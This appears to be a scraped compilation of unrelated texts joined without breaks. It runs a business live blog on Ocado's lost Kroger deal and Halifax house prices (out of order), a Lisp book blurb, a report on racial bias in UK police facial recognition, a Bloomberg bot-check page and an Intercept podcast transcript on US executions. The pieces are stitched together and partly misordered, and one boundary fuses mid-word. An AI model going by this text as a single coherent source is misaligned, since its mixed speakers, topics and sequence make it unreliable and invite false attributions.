But it has also revealed today that Kroger has decided to cancel another tie-up with Ocado – a planned automated distribution centre run on the UK group’s technology in Charlotte, North Carolina.
Last month, retail analyst Clive Black of Shore Capital said Ocado was “being marginalised as most of its customer fulfilment centres do not work economically in the USA”.
Ocado says it continues to “work closely” with Kroger on five other customer fulfillment centres in US states such as Texas and Michigan.
Tim Steiner , CEO of Ocado Group , has said:
“We continue to invest significant resources to support our partners at Kroger, and to help them build on our longstanding partnership. Ocado’s technology has evolved significantly to include both the new technologies that Kroger is currently deploying in its CFC network, as well as new fulfilment products that bring Ocado’s technology to a wider range of applications, including Store Based Automation to support ‘pick up’ and immediacy.”
Our partners around the world have already deployed a wide range of these fulfilment technologies to great effect, enabling them to address a wide spectrum of geographies, population densities and online shopping missions, underpinned by Ocado’s world leading expertise and R&D capabilities. We remain excited about the opportunity for Ocado’s evolving products in the US market.”
Halifax’s Amanda Bryden reckons UK house prices will rise “gradually” next year, saying:
“Looking ahead, with market activity steady and expectations of further interest rate reductions to come, we anticipate property prices will continue to grow gradually into 2026.”
Karen Noye , mortgage expert at Quilter , says affordability remains the biggest hurdle, even though inflation has eased and another interest rate cut is expected later this month, adding:
The outlook for 2026 rests on the path of mortgage rates and the resilience of household incomes. Greater clarity post budget and the prospect of lower borrowing costs give the market a firmer footing, but affordability will remain the defining constraint.”
Tom Bill , head of UK residential research at Knight Frank , blames pre-Budget uncertainty pushed house price growth close to zero, adding:
Clarity has now returned, but an array of tax rises, which include an income tax threshold freeze, will increasingly squeeze demand and prices. Offsetting that is the fact that mortgage rates are expected to drift lower next year as the base rate bottoms out at around 3.25%.”
Technically, UK house prices did rise slightly last month. On Halifax’s data, the average price was £299,892, marginally up from £299,754 in October. That’s a new record high on this index.
Halifax’s regional data continues to show a clear North/South divide – prices fell in the south of the UK last month, but were stronger elsewhere.
Northern Ireland remains the strongest performing nation or region in the UK, with average property prices rising by +8.9% over the past year (up from +7.9% last month). The typical home now costs £220,716.
Scotland recorded annual price growth of +3.7% in November, up to an average of £216,781. In Wales property values rose +1.9% year-on-year to £229,430.
In England, the North West recorded the highest annual growth rate, with property prices rising by +3.2% to £245,070, followed by the North East with growth of +2.9% to £180,939. Further south, three regions saw prices decrease in November.
In London prices fell by -1.0%, the South East by -0.3% and Eastern England by -0.1%. The capital remains the most expensive part of the UK, with an average property now costing £539,766.
Good morning, and welcome to our rolling coverage of business, the financial markets and the world economy.
As the first week of December draws to a close, we have fresh evidence that the economy cooled in the run-up to last month’s budget.
UK house prices were broadly unchanged in November, lender Halifax reports, with that average property changing hands for £299,892. That stagnation follows a 0.5% rise in October, and makes houses slightly more affordable to new buyers.
On an annual basis, prices were 0.7% higher – down from +1.9% house price inflation in October.
Amanda Bryden , head of mortgages at Halifax , explains:
“This consistency in average prices reflects what has been one of the most stable years for the housing market over the last decade. Even with the changes to Stamp Duty back in spring and some uncertainty ahead of the Autumn Budget, property values have remained steady.
While slower growth may disappoint some existing homeowners, it’s welcome news for first-time buyers. Comparing property prices to average incomes, affordability is now at its strongest since late 2015. Taking into account today’s higher interest rates, mortgage costs as a share of income are at their lowest level in around three years.
Shoppers also reined in their spending in the shops last month.
A survey by business advisory service BDO has found that in-store sales grew by just +1.3% in November, despite the potential sales boost from Black Friday.
That is well below the rate of inflation which means that sales volumes are significantly down, BDO says.
7am GMT: Halifax house price index for November
7am GMT: German factory orders data for October
8.30am GMT: UN food commodities price index
3pm GMT: US PCE inflation report
3pm GMT: University of Michigan consumer confidence report
LISP STYLE & DESIGN explores the process of style in the development of Lisp programs. Style comprises efficient algorithms. good organization. appropriate abstractions. well-constructed
function definitions, useful commentary. and effective debugging. Good design and style enhance programming efficiency because they make programs easier to understand, to debug, and to maintain.
A special feature of this book is the large programming example that the authors use throughout to illustrate how the process develops: organizing the approach, choosing constructs, using abstractions, structuring files, debugging code, and improving program efficiency. Lisp programmers, symbolic programmers or those intrigued by symbolic programming,
as well as students of Lisp should consider this book an essential addition to their libraries.
Molly M. Miller is Manager of Technical Publications and Training for Lucid, Inc. She holds degrees in Computer Science, Mathematics, and English and has done graduate work in symbolic and heuristic computation at Stanford University.
Eric Benson is Principal Scientist at Lucid, Inc. He is a graduate of the University of Utah with a degree in mathematics and is a co-founder of Lucid.
Ministers are facing calls for stronger safeguards on the use of facial recognition technology after the Home Office admitted it is more likely to incorrectly identify black and Asian people than their white counterparts on some settings.
Following the latest testing conducted by the National Physical Laboratory (NPL) of the technology’s application within the police national database, the Home Office said it was “more likely to incorrectly include some demographic groups in its search results”.
Police and crime commissioners said publication of the NPL’s finding “sheds light on a concerning inbuilt bias” and urged caution over plans for a national expansion.
The findings were released on Thursday, hours after Sarah Jones, the policing minister, had described the technology as the “biggest breakthrough since DNA matching”.
Facial recognition technology scans people’s faces and then cross-references the images against watchlists of known or wanted criminals. It can be used while examining live footage of people passing cameras, comparing their faces with those on wanted lists, or be used by officers to target individuals as they walk by mounted cameras.
Images of suspects can also be run retrospectively through police, passport or immigration databases to identify them and check their backgrounds.
Analysts who examined the police national database’s retrospective facial recognition technology tool at a lower setting found that “the false positive identification rate (FPIR) for white subjects (0.04%) is lower than that for Asian subjects (4.0%) and black subjects (5.5%)”.
The testing went on to find that the number of false positives for black women was particularly high. “The FPIR for black male subjects (0.4%) is lower than that for black female subjects (9.9%),” the report said.
The Association of Police and Crime Commissioners said in a statement that the findings showed an inbuilt bias. It said: “This has meant that in some circumstances it is more likely to incorrectly match black and Asian people than their white counterparts. The language is technical but behind the detail it seems clear that technology has been deployed into operational policing without adequate safeguards in place.”
The statement, signed off by the APCC leads Darryl Preston, Alison Lowe, John Tizard and Chris Nelson, questioned why the findings had not been released at an earlier opportunity or shared with black and Asian communities.
It said: “Although there is no evidence of adverse impact in any individual case, that is more by luck than design. System failures have been known for some time, yet these were not shared with those communities affected, nor with leading sector stakeholders.”
The government announced a 10-week public consultation that it hopes will pave the way for the technology to be used more often. The public will be asked whether police should be able to go beyond their records to access other databases, including passport and driving licence images, to track down criminals.
Civil servants are working with police to establish a new national facial recognition system that will hold millions of images.
after newsletter promotion
Charlie Whelton, a policy and campaigns officer for the campaign group Liberty, said: “The racial bias in these stats shows the damaging real-life impacts of letting police use facial recognition without proper safeguards in place. With thousands of searches a month using this discriminatory algorithm, there are now serious questions to be answered over just how many people of colour were falsely identified, and what consequences this had.
“This report is yet more evidence that this powerful and opaque technology cannot be used without robust safeguards in place to protect us all, including real transparency and meaningful oversight. The government must halt the rapid rollout of facial recognition technology until these are in place to protect each of us and prioritise our rights – something we know the public wants.”
The former cabinet minister David Davis raised concerns after police leaders said the cameras could be placed at shopping centres, stadiums and transport hubs to hunt for wanted criminals. He told the Daily Mail : “Welcome to big brother Britain. It is clear the government intends to roll out this dystopian technology across the country. Something of this magnitude should not happen without full and detailed debate in the House of Commons.”
Officials say the technology is needed to help catch serious offenders. They say there are manual safeguards, written into police training, operational practice and guidance, that require all potential matches returned from the police national database to be visually assessed by a trained user and investigating officer.
A Home Office spokesperson said: “The Home Office takes the findings of the report seriously and we have already taken action. A new algorithm has been independently tested and procured, which has no statistically significant bias. It will be tested early next year and will be subject to evaluation.
“Given the importance of this issue, we have also asked the police inspectorate, alongside the forensic science regulator, to review law enforcement’s use of facial recognition. They will assess the effectiveness of the mitigations, which the National Police Chiefs’ Council supports.”
To continue, please click the box below to let us know you're not a robot.
Please make sure your browser supports JavaScript and cookies and that you are not blocking them from loading. For more information you can review our Terms of Service and Cookie Policy .
For inquiries related to this message please contact our support team and provide the reference ID below.
Block reference ID:a61d3043-d1d5-11f0-808e-53034710ccbc
Get the most important global markets news at your fingertips with a Bloomberg.com subscription.
SUBSCRIBE NOWAs of December 1, officials across the U.S. have executed 44 people in 11 states, making 2025 one of the deadliest years for state-sanctioned executions in recent history. According to the Death Penalty Information Center, three more people are scheduled for execution before the new year.
The justification for the death penalty is that it’s supposed to be the ultimate punishment for the worst crimes. But in reality, who gets sentenced to die depends on things that often have nothing to do with guilt or innocence.
Historically, judges have disproportionately sentenced Black and Latino people to death. A new report from the American Civil Liberties Union released in November found that more than half of the 200 people exonerated from death row since 1973 were Black.
Executions had been on a steady decline since their peak in the late 1990s . But the numbers slowly started to creep back up in recent years, more than doubling from 11 in 2021 to 25 last year, and we’ve almost doubled that again this year. Several states have stood out in their efforts to ramp up executions and conduct them at a faster pace — including Alabama .
Malcolm Gladwell’s new podcast series “ The Alabama Murders ” dives into one case to understand what the system really looks like and how it operates. Death by lethal injection involves a three-drug protocol: a sedative, a paralytic, and, lastly, potassium chloride, which is supposed to stop the heart. Gladwell explains to Intercept Briefing host Akela Lacy how it was developed, “It was dreamt up in an afternoon in Oklahoma in the 1970s by a state senator and the Oklahoma medical examiner who were just spitballing about how they might replace the electric chair with something ‘more humane.’ And their model was why don’t we do for humans what we do with horses?”
Liliana Segura , an Intercept senior reporter who has covered capital punishment and criminal justice for two decades , adds that the protocol is focused on appearances. “It is absolutely true that these are protocols that are designed with all of these different steps and all of these different parts and made to look, using the tools of medicine to kill … like this has really been thought through.” She says, “These were invented for the purpose of having a humane-appearing protocol, a humane-appearing method, and it amounts to junk science.”
Listen to the full conversation of The Intercept Briefing on Apple Podcasts , Spotify , or wherever you listen.
Akela Lacy: Malcolm and Liliana, welcome to the show.
Malcolm Gladwell: Thank you.
Liliana Segura: Thank you.
AL: Malcolm, the series starts by recounting the killing of Elizabeth Sennett, but very quickly delves into what happens to the two men convicted of killing her, John Parker and Kenny Smith. You spend a lot of time in this series explaining, sometimes in graphic detail, how the cruelty of the death penalty isn’t only about the execution, but also about the system around it — the paperwork, the waiting. This is not the kind of subject matter that you typically tackle. What drew you to wanting to report on the death penalty and criminal justice?
MG: I wasn’t initially intending to do a story about the death penalty. I, on a kind of whim, spent a lot of time with Kate Porterfield, who’s the psychologist who studies trauma, who shows up halfway through “The Alabama Murders.”
I was just interviewing her about, because I was interested in the treatment of traumatized people, and she just happened to mention that she’d been involved with the death penalty case — and her description of it was so moving and compelling that I realized, oh, that’s the story I want to tell. But this did not start as a death penalty project. It started as an exploration of a psychologist’s work, and it kind of took a detour.
AL: Tell us a little bit more about how the bureaucracy around the death penalty masks its inherent cruelty.
MG: There’s a wonderful phrase that one of the people we interviewed, Joel Zivot, uses. He talks about how the death penalty — he was talking about lethal injection, but this is also true of nitrogen gas — he said it is the impersonation of a medical act. And I think that phrase speaks volumes, that a lot of what is going on here is a kind of performance that is for the benefit of the viewer. It has to look acceptable to those who are watching, to those who are in society who are judging or observing the process.
“They’re interested in the impersonation of a medical act, not the implementation of a medical act.”
It is the management of perception that is compelling and driving the behavior here — not the actual treatment of the condemned prisoner him/herself. And once you understand that, oh, it’s a performance, then a lot of it makes sense.
One of the crucial moments in the story we tell is, where there is a hearing in which the attorneys for Kenny Smith are trying to get a stay of execution, and they start asking the state of Alabama, the corrections people in the state of Alabama to explain, did they understand what they would do? They were contemplating the use of nitrogen gas. Did they ever talk to a doctor about the risks associated with it? Did they ever contemplate any of the potential side effects ? And it turns out they had done none of that. And it makes sense when you realize that’s not what they’re interested in.
They’re interested in the impersonation of a medical act, not the implementation of a medical act. The bureaucracy is there to make it look good, and that was one of the compelling lessons of the piece.
AL: And it’s impersonating a medical act with people who are not doctors, right? Like people who are not, do not have this training.
MG: In that hearing, there’s this real incredible moment where one of the attorneys asks the man who heads Alabama’s Department of Corrections, did you ever consult with any medical personnel about the choice of execution method and its possible problems? And the guy says no.
You just realize, they’re just mailing it in. Like they have no — the state of Alabama is not interested in exploring the kind of full implications of what they’re doing. They’re just engaged in this kind of incredibly slapdash operation.
“It has to look acceptable to those who are watching, to those who are in society who are judging or observing the process.”
AL: Liliana, I wanna bring you in here. You’ve spent years reporting on capital punishment in the U.S. and looked into many cases in different states. Why are states like Florida and Alabama ramping up the number of executions? Is it all politics? What’s going on there?
LS: That is one of the questions that I think a lot of us who cover this stuff have been asking ourselves all year long. And to some degree, it’s always politics. The story of the death penalty, the story of executions, so often really boils down to that.
We are in a political moment right now where the climate around executions , certainly, but I think in general, the kind of appetite for or promotion of vengeance and brutality toward our enemies is really shockingly real right now. And I was reluctant about a year ago to really trace our current moment to Trump . The death penalty has been a bipartisan project ; I don’t want to pretend like this is something that begins and ends with somebody like Trump.
That said, it’s really shocking to see the number of executions that are being pushed through, especially in Florida. And this is something that has been ramped up by Gov. DeSantis for purely political reasons. This death penalty push in Florida began with his political ambitions when he was originally going to run for president. And I think that to some degree is a story behind a lot of death penalty policy, certainly going back decades, and certainly speaks to the moment we’re in.
I did want to just also touch on some of what Malcolm was talking about when it comes to the performance of executions themselves. Over the past many years, I’ve reported on litigation, death penalty trials, that have taken place in states like Oklahoma and here in Tennessee where I live, where we restarted executions some years ago after a long time of not carrying any out. And these trials had, at the center, the three-drug protocol that is described so thoroughly in the podcast.
It is absolutely true that these are protocols that are designed with all of these different steps and all of these different parts and made to look — using the tools of medicine to kill — and made to look like this has really been thought through. But when you really trace that history — as you do, Malcolm, in your podcast — there’s no there there.
These were invented for the purpose of having a humane-appearing protocol, a humane-appearing method, and it amounts to junk science. There was no way to test these methods. Nobody can tell us, as you described in your podcast, what it feels like to undergo this execution process. And I think it’s really important to remember that this is not only the story of lethal injection, this is the story of executions writ large.
When the electric chair came on the scene generations ago, it was also touted as the height of technology because it was using electricity and it was supposed to be more humane than hanging. There had been botched hangings that were seen as gruesome ordeals. So there’s this bizarre way in which history repeats itself when it comes to these methods that are promoted as the height of modernity and humanity —and it’s just completely bankrupt and false.
AL: Malcolm, do you want to add something?
MG: Yeah, we have a big focus in the case I’m describing, Kenny Smith, was notorious because he had a botched execution where they couldn’t find a vein. And one of the points that Joel Zivot makes is that, of course, it’s not surprising that they, in that case and in many others, they can’t find a vein because that is a medical procedure that is designed to be undertaken in a hospital setting by trained personnel with the cooperation of the patient. Usually we’d find a vein, and the patient cooperates because we’re trying to save their life or make them healthier. This is a use of this procedure that is completely different. It is outside of a medical institution, not being done by people who are experienced medical professionals, and is not being done with the cooperation of the patient. The patient in this case is a condemned prisoner who is not in the same situation as someone who’s ill and trying to get better.
AL: I want to just walk our listeners through this. So this is, again, one of the pieces of the series, this three-drug protocol. First there’s a sedative, then there’s a paralytic, and then there’s finally potassium chloride, which is supposed to stop the heart. How did that protocol come to be developed?
MG: It was dreamt up in an afternoon in Oklahoma in the 1970s by a state senator and the Oklahoma medical examiner who were just spitballing about how they might replace the electric chair with something “more humane.”
And their model was, well, why don’t we do for humans what we do with horses? Which was a suggestion that had come from Ronald Reagan, then governor of California. So they just generally thought, well, we can do a version of what we do in those instances, only we’ll just ramp up the dose. This is also a kind of anesthesia sometimes.
AL: This is advertised as something that is supposed to be painless.
MG: And these drugs were also in use in the medical setting, but their idea was, we’ll take a protocol that is loosely based on what is used in a medical setting and ramp up the doses so that instead of merely sedating somebody, we’re killing them.
“ It wasn’t thought through, tested, analyzed, peer-reviewed. It was literally two guys.”
And it wasn’t thought through, tested, analyzed, peer-reviewed. It was literally two guys, dreaming up something on the back of an envelope. And one of the guys, the medical examiner, later regretted his part in the whole procedure, but the genie was out of the bottle. And everybody jumped on this as an advance over the previous iteration of killing technology.
AL: In addition to being advertised as painless, it’s also supposed to be within the bounds of the Eighth Amendment protection against cruel and unusual punishment. Can you tell us about that?
MG: In order to satisfy that prohibition against cruel and unusual punishment, you have to have some insight as to what the condemned prisoner is going through when they are being subjected to this protocol. The universe of people engaged in the capital punishment project were universally indifferent to trying to find out how exactly this worked. They weren’t curious at all to figure out, for example, was there any suffering that was associated with this three-drug protocol, or which of the three drugs is killing you? Or, I could go on and on and on.
They just implemented it and because it looked good from the outside, because you have given someone a sedative and a paralytic, it’s impossible to tell from the outside whether they’re going through any kind of suffering. It was just assumed that there should be no, there must be no suffering going on the inside.
And the Eighth Amendment does not say that people should not be subjected to the appearance of cruel and unusual punishment. It says, no, the actual punishment itself for the individual should not be cruel and unusual. So there was, at no point could anyone, in the early history of this, did anyone truly satisfy the intent of the Eighth Amendment.
AL: Liliana, you’ve written a lot about this protocol as well, and the Supreme Court has taken a stance on it . Tell us about that.
LS: So one thing that’s really important to understand about the Eighth Amendment and the death penalty in this country is that the U.S. Supreme Court has weighed in on the death penalty numerous times, but has never invalidated a method of execution as violating the Eighth Amendment ban on cruel and unusual punishment. And that fact right there I think speaks volumes.
But one of the cases that I go back to over and over again in my work about lethal injection and about other execution methods, dates back to the 1940s, and it’s a case involving a man named Willie Francis, who was a teenager, a Black teenager who had been condemned to die in Louisiana. They sent him to the electric chair in 1946, and he survived. He survived their initial attempts to execute him. It’s a grotesque ordeal, there’s been a lot written historically about this.
That case, they stopped the execution. He appealed to the U.S. Supreme Court , and a majority of justices found that attempting to kill him again, wouldn’t violate the Eighth Amendment, and they sent him back in 1947, they succeeded in killing him. But the language that comes out of the court in this case really goes a long way to helping us understand how we ended up where we are now. They essentially said, “Accidents happen. Accidents happen for which no man is to blame.” And there’s another turn of phrase that’s really galling in which essentially they call this ordeal that he suffered “ an innocent misadventure .” And this language, this idea that this was an innocent misadventure finds its way into subsequent rulings decades later.
So in 2008, I believe it was, the U.S. Supreme Court took up the three-drug protocol, which at the time was being used by Kentucky. This was a case called Baze v. Rees . There was a lot of evidence, there was a lot that the justices had to look at that should have given them pause about the fact that this protocol was not rooted in science. That there had been many botched executions — in terms of the inability to find a vein, in terms of evidence that people were suffering on the gurney.
The U.S. Supreme Court upheld that protocol, and yet right around the time that they handed down that ruling, states began tinkering with the lethal injection protocol that had been the prevailing method for so long.
Without getting too deep in the weeds, the initial drug — the drug that was supposed to anesthetize people who were being killed by lethal injection — had been originally a drug called sodium thiopental , which was thought to be, believed to be, for good reasons something that could basically put a person under, where they wouldn’t necessarily feel the noxious effects of the subsequent drugs.
States were unable to get their hands on this drug for a number of reasons, and subsequently began swapping out other drugs to replace that drug. And different states tried different things. A number of states eventually settled on this drug called midazolam , which is a sedative, which does not have the same properties as the previous drug — and over and over again, experts have said that this is not a drug that’s going to be effective in providing and anesthetizing people for the purpose of lethal injection.
The Supreme Court once again ruled that this was true. In Oklahoma, this was the case Glossip v. Gross, which the Supreme Court heard after there had been a very high profile really gruesome, botched execution, a man named Clayton Lockett who was executed in 2014. This ended up going up to the Supreme Court. And I covered that oral argument and what was really astonishing about that oral argument wasn’t just how grotesque it all was, but the fact that the justices were very clearly, very annoyed, very cranky about the fact that, only a few years after having upheld this three-drug protocol, now they’re having to deal with this thing again. And again, they upheld this protocol, despite a lot of evidence that this was completely inhumane, that there was a lot of reason to be concerned that people were suffering on the gurney, while being put to death by lethal injection.
And so the reason I go back to the Willie Francis case is that it really tells us everything that we need to know. Which is that if you have decided that people condemned to die in this country are less than human, and that their suffering doesn’t matter, then there’s no limits on what you are willing to tolerate in upholding this death protocol that we’ve invented in this country. And so the Supreme Court has weighed in not only on the three-drug protocol, but on execution methods in general. And they have always found that there’s not really a problem here.
“If you have decided that people condemned to die in this country are less than human, and that their suffering doesn’t matter, then there’s no limits on what you are willing to tolerate in upholding this death protocol that we’ve invented in this country.’
MG: At a certain point, it becomes obvious that the cruelty is the point. The Eighth Amendment does not actually have any kind of impact on their thinking because they are anxious to preserve the very thing about capital punishment that is so morally noxious, which is that it’s cruel.
AL: Malcolm, one interesting thing that you talk about in this series is this concept of judicial override in Alabama, where a judge was able to impose a death sentence even if the jury recommended life in prison. This went on until 2017. As we know, death penalty cases can take decades, so it’s possible that there are still people on death row who have been impacted by judicial override. What’s your sense about how judges who went that route justified their decisions, if at all?
MG: So Alabama was one of a small number of states who, in response to the Supreme Court’s hesitancy about capital punishment in the 1970s, instituted rules which said that a judge can override a jury’s sentencing determination in a capital case.
So if a jury says, “We want life imprisonment without parole,” the judge could impose a death penalty or vice versa. The motivation for these series of override laws — and there are only about three or four states in Florida, Alabama, a couple of others had them — is murky. But I suspect what they wanted to do was to guard against the possibility that juries would become overwhelmingly lenient.
The concern was that if the public sentiment was moving away from death penalty to the extent that it would be difficult to impose a death penalty in capital cases, unless you allowed judges to independently assert their opinion when it came to sentencing. And I also suspect that there’s, in states like Alabama, there was a little bit of a racial motivation that they thought that Black juries would be unlikely to vote for the death penalty for Black defendants, and they wanted to reserve the right to act in those cases.
And what happens in Alabama is that other states gradually abandon this policy, but Alabama sticks to it — not only that, they have the most extreme version of it. They basically allow the judge to overrule under any circumstances without giving an explanation for why.
And when they finally get rid of this, they don’t make it retroactive. So they only say, “Going forward, we’re not going to do override. But we’re not going to spare people who are on death row now because of override — we’re not going to spare their lives.” And so it raises this question about, the reason we call our series “The Alabama Murders” is that when you look very closely at the case we’re interested in, you quickly come to the conclusion there’s something particularly barbaric about the political culture of Alabama. Not news, by the way, for anyone who knows anything about Alabama. But Alabama, it’s its own thing, and they remain to this day clinging to this notion that they need every possible defense against the possibility that a convicted murderer could escape with his life.
AL: Speaking of this idea of the title of the show, I also want to bring up that I did not know that the autopsy in an execution, and I don’t know that this is unique to Alabama, but that it marks the death as a homicide. I was actually shocked to hear that.
MG: Yeah, isn’t that interesting? That is the one moment of honesty and self-awareness in this entire process.
AL: Right, that’s why it’s shocking. It’s not shocking because we know it’s a homicide. It’s shocking because they’re admitting to it in a record that is accessible to the public at some point.
[Break]
AL: Malcolm, you mentioned the racial dynamic with Alabama in particular, but Liliana, I want to ask if you could maybe speak to the historic link between the development of the death penalty and the history of lynching in the South.
LS: So it’s really interesting. Alabama is, in many ways, the poster child for this line that can be drawn between not only lynching, but slavery to lynching, to Reconstruction, to state-sanctioned murder. And that’s an uneasy line to draw in the sense of — there’s a reason that Bryan Stevenson, who is the head of the Equal Justice Initiative, has called the death penalty the “stepchild of lynching.”
He calls it the stepchild of lynching and it’s because, there’s something of an indirect link, but it’s an absolutely — that link is real. And you really see it in Alabama and certainly in the South. I think it was in 2018, I went down to Montgomery a number of times for the opening of EJI’s lynching memorial that they had launched there and this was a major event. At the time I went with this link in mind to try to interrogate and understand this history a little bit better. And I ended up writing this big long piece, which I only recently went back to reread because it’s not fresh in my mind anymore.
But one of the things that is absolutely, undoubtedly true is that the death penalty in the South in its early days was justified using the exact same rationale that people used for lynching, which was that this was about protecting white women from sexually predatory Black men.
“The death penalty in the South in its early days was justified using the exact same rationale that people used for lynching.”
And that line, that consistent feature of executions — whether it was an extrajudicial lynching or an execution carried out by the state — has been really consistent and I think overlooked in the history of the death penalty. And part of the reason it’s overlooked is that, again, going back to the Supreme Court, there have been a number of times that this history has come before the Supreme Court and other courts, and by and large, the reaction has been to look away, to deny this.
That is absolutely true in the years leading up to the 1972 case, Furman v. Georgia , which Malcolm alluded to earlier, there was this moment where the Supreme Court had to pause executions. And this was a four-year period in the ’70s. 1972 was Furman v. Georgia. 1976 was Gregg v. Georgia. Part of the reason that Furman, which was this 1972 case, invalidated the death penalty across the country, was because there was evidence that executions, that death sentences were being handed down in what they called an arbitrary way.
And in reality, it wasn’t so much arbitrariness, as very clear evidence of sentences that were being given disproportionately to people of color, to Black people, and history showed that that was largely motivated by cases in which a victim was white. It was a white woman maybe who had been subjected to sexual violence. There is that link, and I think it’s really important to remember that.
In Alabama, one of the really interesting things too, going back to judicial override, there’s this kind of irony in the history of judicial override in the way that it was carried out by judges. Alabama, when they restarted the death penalty in the early ’80s, was getting a lot of flack for essentially having a racist death penalty system. Of course, there was a lot of defensiveness around this, and there were judges who, actually, in cases where juries did not come back with a death sentence for a white defendant, there were cases where judges then overrode that decision in a sort of display of fairness.
One of the things that I found when I was researching my piece from 2018 was that there was a judge in, I believe it was 1999, who explained why he overrode the jury in sentencing this particular white man to die. And he said, “If I had not imposed the death sentence, I would’ve sentenced three Black people to death and no white people.” So this was his way of ensuring fairness. “Well, I’ve gotta override it here,” never mind what it might say about the jury in the decision not to hand down a death sentence for a white person.
“They needed the appearance of fairness.”
Again, it goes back to appearance. They needed the appearance of fairness. And so Alabama really does typify a certain kind of racial dynamic and early history of the death penalty that you see throughout the South, not just the South, but especially in the South.
AL: One of the things proponents of the death penalty are adamant about is that it requires some element of secrecy to survive.
Executions happen behind closed walls, in small rooms, late at night. The people involved never have their identities publicly revealed or their credentials. The concern being that if people really knew what was involved, there would be a massive public outcry. Malcolm, in this series you describe in gruesome detail what is actually involved in an execution. For folks who haven’t heard the series, tell us about that.
MG: In Alabama, there is a long execution protocol. A written script, which was made public only because it came out during a lawsuit, which kind of lays out all the steps that the state takes. And Alabama also has, to your point, an unusual level of secrecy.
For example, in many states, the entire execution process is open, at least to witnesses. In Alabama, you only see the person after they’ve found a vein. So the Kenny Smith case, we were talking about where they spent hours unsuccessfully trying to find a vein — that was all done behind closed doors.
And the second thing that you pointed out is the people who are involved remain anonymous, and you can understand why. It is an acknowledgment on the part of these states that they are engaged in something shameful. If they were as morally clearheaded as they claim to be, then what would be the problem with making every aspect of the process public?
But instead, they go in the opposite direction and they try and shroud it. They make it as much of a mystery as they can. And it’s funny, so much of our knowledge about death penalty procedures only comes out because of lawsuits.
“If they were as morally clearheaded as they claim to be, then what would be the problem with making every aspect of the process public?”
It is only under the compulsion of the judicial process that we learn even the smallest tidbit about what’s going on or what kind of thought went into a particular procedure. When we’re talking about the state taking the life of a citizen of the United States, that’s weird, right?
We have more transparency over the most prosaic aspects of government practice than we do about something that involves something as important as taking someone’s life.
AL: Liliana, you’ve witnessed two executions. Tell us about your experience, and particularly this aspect of secrecy surrounding the process.
LS: Let me just pick up first on the secrecy piece because one of the really bizarre aspects of the death penalty, when you’ve covered it in different states and looked at the federal system as well, is that there’s just this wide range when it comes to what states and jurisdictions are willing to reveal and show.
What they are not willing to reveal is certainly the individuals involved. A ton of states have or death penalty states have passed secrecy legislation essentially bringing all of that information even further behind closed doors. The identity of the executioners was always sort of a secret. But now we don’t get to know where they get the drugs , and in some states, in some places, the secrecy is really shocking. I just wrote a story about Indiana, which recently restarted executions . And Indiana is the only active death penalty state that does not allow any media witnesses. There is nothing, and that’s exceptional.
And if you go out and try as a journalist to cover an execution in Indiana, it’s not going to be like in Alabama or in Oklahoma, where the head of the DOC comes out and addresses things and says, whether true or not true, “Everything went great.” No, you are in a parking lot at midnight across from the prison. There is absolutely nobody coming to tell you what happened. It’s a ludicrous display of indifference and contempt, frankly, for the press or for the public that has a right and an interest in knowing what’s happening in their names. So secrecy — there’s a range, I guess is my point, and yes, most places err on the side of not revealing anything, but some take that a lot further than others.
In terms of the experience of witnessing an execution, that’s obviously a big question. I will say that both those executions were in Oklahoma. That is a state that has a really ugly sordid history of botched executions going back longer than 10 years .
But Oklahoma became infamous on the world stage about 10 years ago, a little more, for botching a series of executions. I’ve been covering the case of Richard Glossip for a while. Richard Glossip is a man with a long-standing innocence claim whose death sentence and conviction was overturned only this year. Richard Glossip was almost put to death by the state of Oklahoma in 2015, and I was outside the prison that day. And it’s only because they had the wrong drug on hand that it did not go through.
And so going into a situation where I was preparing to witness an execution in Oklahoma, I was all too keenly aware of the possibility that something could go wrong — and that’s just something you know when you’re covering this stuff. And instead, Oklahoma carried out the three-drug protocol execution of a man named Anthony Sanchez in September of 2023. I had written about Anthony’s case. I had spoken to him the day before and for the better part of a year. And I think I’m still trying to understand what I saw that day because, by all appearances, things looked like they went as smoothly as one would hope, right?
He was covered with a sheet. You saw the color in his face change. He went still. And as a journalist or just an ordinary person trying to describe what that meant, what I was seeing — I couldn’t really tell you, because the process by design was made to look that way, but I could not possibly guess as to what he was experiencing.
Again, that’s because lethal injection and that three-drug protocol has been designed to make it look humane and make it look like everything’s gone smoothly.
I will say one thing that has really stuck with me about that execution was that I was sitting right behind the attorney general of Oklahoma, Gentner Drummond, who has attended — I think to his credit, frankly — every execution that has been carried out in Oklahoma under his tenure. And he was sitting in front of me and a member of the one witness who was there, who, I believe, was a member of Anthony’s family was sitting one seat over. After the execution was over, she was quietly weeping, and Gentner Drummond, the attorney general who was responsible for this execution, put his hand on her and said, “I’m sorry for your loss.” And it was this really bizarre moment because he was acknowledging that this was a loss, that this death of this person that she clearly cared about — he was responsible for it.
And I don’t know that he has ever said something like that since, because a lot of us journalists in the room reported back. And it’s almost like, you’re not supposed to say that — there shouldn’t be sorrow here, really. This is justice. This is what’s being done in our name. And I’m still trying to figure out how I feel about that. Because by and large in the executions I’ve reported on, you don’t have the attorney general himself or the prosecutor who sent this person to death row attending the execution. It’s out of sight, out of mind.
AL: Malcolm, as we’ve talked about and has been repeatedly documented, the way that the death penalty has been applied has been racist and classist, disproportionately affecting Black and Latino people and poor people. It has also historically penalized people who have mental health issues or intellectual disabilities . Even with all that evidence, why does this persist? How has vengeance become such a core part of the American justice system?
MG: As I spoke before, I think what’s happened is that the people who are opposed to death penalty are having a different conversation than the people who are in favor of it.
The people who are in favor are trying to make a kind of moral statement about society’s ultimate intolerance of people who violate certain kinds of norms, and they are in the pursuit of that kind of moral statement, willing to go to almost any lengths. And on the other side are people who are saying that going this far is outside of the moral boundaries of a civilized state.
Those are two very different claims that proceed on very different assumptions. And we’re talking past each other. It doesn’t matter to those who are making a broad moral statement about society’s intolerance what this condition, status, background, makeup of the convicted criminal is — because they’re not basing their decision on the humanity of the defendant, the criminal defendant. They’re making a broad moral point.
“I’ve often wondered whether in doing series, as I did, that focus so heavily on the details of an execution, I’m contributing to the problem.”
I’ve often wondered whether in doing series, as I did, that focus so heavily on the details of an execution, I’m contributing to the problem. That if opponents make it all about the individual circumstances of the defendant, the details of the case, was the person guilty or not, was the kind of punishment cruel and unusual — we’re kind of buying into the moral error here.
Because we’re opening the possibility that if all we were doing was executing people who were 100% guilty and if our method of execution was proven without a shadow of a doubt to be “humane,” then we don’t have a case anymore.
AL: Right, then it’d be fine.
MG: So I look at what I’ve done — that’s my one reservation about spending all this time on the Kenny Smith case, is that we shouldn’t have to do this. It should be enough to say that even the worst person in the world does not deserve to be murdered by a state.
